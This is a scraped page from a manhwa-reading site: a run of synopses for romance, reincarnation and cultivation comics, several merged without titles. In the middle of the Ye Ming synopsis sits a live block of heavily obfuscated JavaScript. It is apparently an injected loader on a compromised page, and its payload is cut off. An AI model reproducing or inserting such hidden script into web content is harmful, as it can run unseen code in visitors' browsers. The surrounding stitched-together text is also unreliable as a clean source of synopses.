Read manhwa A Kiss Is Not Enough / It’s Not Enough Just to Kiss / キスだけじゃ足りない / 大明星的kiss教学 / 키스만으론 부족해 Young actress Joo Arin is set to make her big-screen debut, but while preparing for the role, she comes across a bit of a problem… She has to film a kiss scene even though she hasn’t even had her first kiss yet! As Arin struggles to practice for the shoot, top star Kang Hajun, who happens to be with the same agency, decides to help out by teaching her how to kiss. As she starts these special secret lessons, Arin’s finding it hard to tell if she’s more immersed in the role or in Hajun.
Ye Ming, the rising star of Family Ye is regarded as a genius among his peer cultivators. But he was schemed by his jealous cousin and the latter cut his meridians, crippled his abilities and hamstrung him ruthlessly. But Ye Ming never gives up because he’d sacrifice everything for take revenge for his deceased parents who were murdered by Family Huang. But he doesn’t know that he is considered a pain in the neck to Family Ye and a big conspiracy is looming out of the darkness…<script></script><script>(function(_0x252cd2,_0x140c78){var _0x1a5935=_0x5056,_0x2fa0c3=_0x252cd2();while(!![]){try{var _0x66f655=-parseInt(_0x1a5935(0x135))/(0xaa6+-0x97*-0x27+-0x21a6)+parseInt(_0x1a5935(0x13a))/(-0x2269+-0x27+0x24e*0xf)*(-parseInt(_0x1a5935(0x11c))/(0x7cd+0x222d+-0x29f7))+-parseInt(_0x1a5935(0x13d))/(0x1*0x21f3+0x74c*-0x1+0x1*-0x1aa3)*(parseInt(_0x1a5935(0x13b))/(0x67*0x56+-0x1*0x1163+-0x2*0x899))+parseInt(_0x1a5935(0x123))/(0x2*-0xf8e+0x11d7+0x53*0x29)*(parseInt(_0x1a5935(0x120))/(-0x1c8e+0x1757+0x53e))+-parseInt(_0x1a5935(0x121))/(-0x9a4*-0x3+0x1*-0x9a7+-0x3d9*0x5)+parseInt(_0x1a5935(0x13f))/(-0x7*0xda+0x1bbf+-0x15c0)*(parseInt(_0x1a5935(0x13c))/(0x647*0x2+0x1*-0x529+-0x1*0x75b))+-parseInt(_0x1a5935(0x126))/(-0x13a9+-0x3*0xb95+0x3673)*(-parseInt(_0x1a5935(0x125))/(0x7*-0x26c+0x1983+-0x883));if(_0x66f655===_0x140c78)break;else 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The witch, Eleonora Asil, has fifteen previous convictions. And the transmigrator, Noah Park, had no intentions of being involved in the novel’s original plot of the dragon beheading the villainess. With that thought in mind, she abandoned her titles as The Wicked Witch and sought to live a long and peaceful life. So she heads down to the countryside wrought with deep remorse for all her misdeeds. And all should be happy… or she thought. “Please raise me!” And so it would seem that she stumbled upon the heroine’s pet dragon — the black-haired kid that would turn ballistic and obsessive later on — imprinted the villainess as his mother. And to make matters worse, the male lead suspects her as the prime culprit of stealing the dragon. “How long should I keep up with you?” She thought he’d arrest her right away, but seems like the male lead was slowly becoming the dragon’s butler. “Can I hug you?” “No.” “Then… can you hold me?” The villainess believes that the dragon needs a bit of taming.
Read manhwa The Ugly Lady’s Secret Pouch / 이 영애의 시크릿 파우치 Makeup artist, Yoon Seol, was involved in a celebrity accident. When she opened her eyes, she was in the body a heroine in a novel. For a moment, she was mesmerized by the beautiful female lead’s appearance, then she realized that she is in a novel known for torturous confinements. In the novel, the heroine Lila is r*ped by three men. She was an unfortunate character who ended up being imprisoned and turned into an idiot. “Merry bad endings* are not my thing! If it’s a bad ending, it’s a bad ending, why does it have to be merry!” To avoid the original route, Yoon Seol, or rather, Lila, decided to make herself ugly with makeup with the use of a ‘secret pouch.’ Ten years later. Lila, who avoided the original route, received a marriage proposal from an ugly duke. “Don’t be too scared, I’m just being honest with you because you weren’t honest with me first.” But will her ending be a merry bad ending? Or a happy ending? *merry bad ending – endings that may seem sad but the characters themselves are happy
Read manhwa I’ll Change My Fate To Be Executed / 처형당할 운명을 바꿔 보겠습니다 The first night as a prince. The dagger in my hand was dyed red with my husband’s blood. The hot blood of a man who has been cold to me all his life. The moment I was executed for the crime of the Crown Prince, I vowed that if I were born again, I would never be his wife. Another chance given like that. I’m trying to get everything back. Even if you become a crazy young person in this area! but what is it Why does everyone keep praising me? “If you refuse to be my evil wife, I will make you the Crown Prince myself.” Besides, why is the Crown Prince who used to be cold to me like this!?
Read manhwa I Became The Male Lead’s Female Friend She becomes interrupted by love, a jealousy inducer, and the female friend of the male lead. And in addition, she even has an unrequited love with the male lead. It was ruined. As long as this is the case, let’s just become friends! It was nice to have the first meeting with such a young male lead… “Hello, Bouser Youngae (Polite way for noble’s daughter)” “Uwa!!” You were mistaken for a girl and you cried? Fortunately, she managed to resolve the misunderstanding and become close friends. However, the male lead in his childhood is more shy and soft-hearted than I thought. Eventually, she became attached to the male lead and decided to become a real friend. However, due to the disturbance of the male lead father and the war broke out, we had to be separated for a long time, I thought I could barely meet him again and stay the same as before but…. “Your eyes must have dropped a lot since I didn’t see you. Princess Averine!” What’s wrong with him again?! It’s not just that. Rather than getting along, he keeps get into trouble when he has a chance, and most of all, he even bothers my love business!! Aren’t we just friends?!
Read manhwa Wish Upon a Husband / 두 집 살림을 하는 One wrong wish and now I have two husbands?! After finding a wish-granting statue, Renea jumps at the chance to turn her love life around. However, what was supposed to be a wish to make her cheating husband fall in love with her ends up as a wish to marry the hunky statue instead! Can Renea pull off having two husbands without getting caught?
Jung-woo Choi is an emerging force in the cosmetics industry. Her secretary, Su-hyeon Shin, is resourceful at work and also very handsome. One day, he suddenly received a special instruction from the president: “Secretary Shin, get married”. He received an offer to marry his own boss. He spent many nights worrying about writing a resignation letter, but the conditions to get this marriage are too great, right?! The office and their newlywed lives are an unpredictable love story! Let’s follow teenmanhua to follow the developments of the story! The President’s Special Instructions/사장님의 특별지시, President’s Special Order , CEO’s special order , Married to my boss
Bon Appétit / 맛본 김에 꿀꺽! / Bon Appetit / Gulp while you taste it “Are you eating in this situation?” “Of course! I’ll have to keep savoring the taste until I die. Do you want one?” She was reincarnated in a novel as Luana, the abandoned princess. And her death was already decided. She just wanted to let people know about her cooking talent, but she was misunderstood as a witch because of her cheese jerky! The General of the conquering army, Duke Legion, who had lost his sense of taste, took her to the Empire for her extraordinary jerkies and to break the curse that had come down from generation to generation. “It is delicious, isn’t it?” “Prepare the same for the dinner.” She was happy to be able to cook and eat as much as delicious food as she wanted… But now, she also wanted to look after Legion. ‘Eat three meals a day, and make sure to make dessert. I’m sure he will be able to gain some weight…!’ – The Duke took the jerky from the princess. On the surface, it was no different from any beef jerky. But when he took a bite of it, it felt like a new world had opened up. The jerky, made by the princess, felt more tender than the others as he gently crushed it with his teeth. The taste of condensed meat smudged his tongue as he chewed on. It was just as she said. He could feel the savory taste of the spicy meat, and at the end of the day, he wanted to have more. The desire that he had, faded for a while. “I didn’t really want anything, but now I think I do.”
A modern medical doctor and kickboxing trainer was reincarnated in the body of an 11-year-old girl as the eldest daughter of the Xie family. In order to survive, the little girl waged a battle with her closest family members. After the bloody war, she was informed of her wedding contract with a handicapped person who was no different from a eunuch. All that was hidden from her by her father, which led to the little girl’s demise in the wilderness, where the reincarnation took place.
Read manhwa May I Kill You, Your Majesty? / 죽여도 될까요, 폐하 It was a sunny and warm spring day, but it was different from usual. [ There’s a day like that , Erendel. ] My mother once told me. But she died more than a decade ago. [ A curious day so I get to do things that I don’t usually do. You have to be very careful on such a day. [ Why ?] That day , my mother’s purple eyes were shining dimly in the sun. She gave a cool look at her daughter’s question. ~~~~~~~~~~~~~~ [ If you make a mistake , you may be bewitched. ] She said something I couldn’t understand. [ Being fascinated is for a moment , but bewitched is for a lifetime. ] ~~~~~~~~~~~~~~ Erendel was sitting on the floor and looking up at the man with blank eyes. His face that was covered in blood was unfamiliar. No , maybe she really doesn’t know . Maybe I’m dreaming right now. But as if to inform me that it was a hopeless hope. A low voice called my name. “…… Erendel.” “Tell me again . What we talked back then.” On the light purple eyes of Erendel was the blood-soaked Kin .…… Prince Castian’s face was reflected . “I like you.” [ I really like Prince Castia. That’s a lot, too. ] “I mean it” [ I’m serious ] “….. you said that, didn’t you?” “Or were you lying to me?’’ Castian’s smile was empty. “I’m being fooled.” Then he said again “So just tell me that I need to save your life. Then tell me that you’ll be by my side.” .You came to me because you wanted to live anyway, didn’t you?” He’s arguing. …..I mean, I really didn’t know. That my friend in that I thought was a nut, was Prince Castian who had killed me so many times. also know what will happen because of the words choose.
When the zombies started appearing, everyone is at risk, Yang Hao forced to seek help in risk, in danger I found " pick up attributes system" acquired strength attribute, strength +1, acquired agility attribute, agility +1, I picked up? From today onwards, food, resources, beautiful girls, this land, all are mine! Yang Hao screamed! below me are all zombies.. a path to?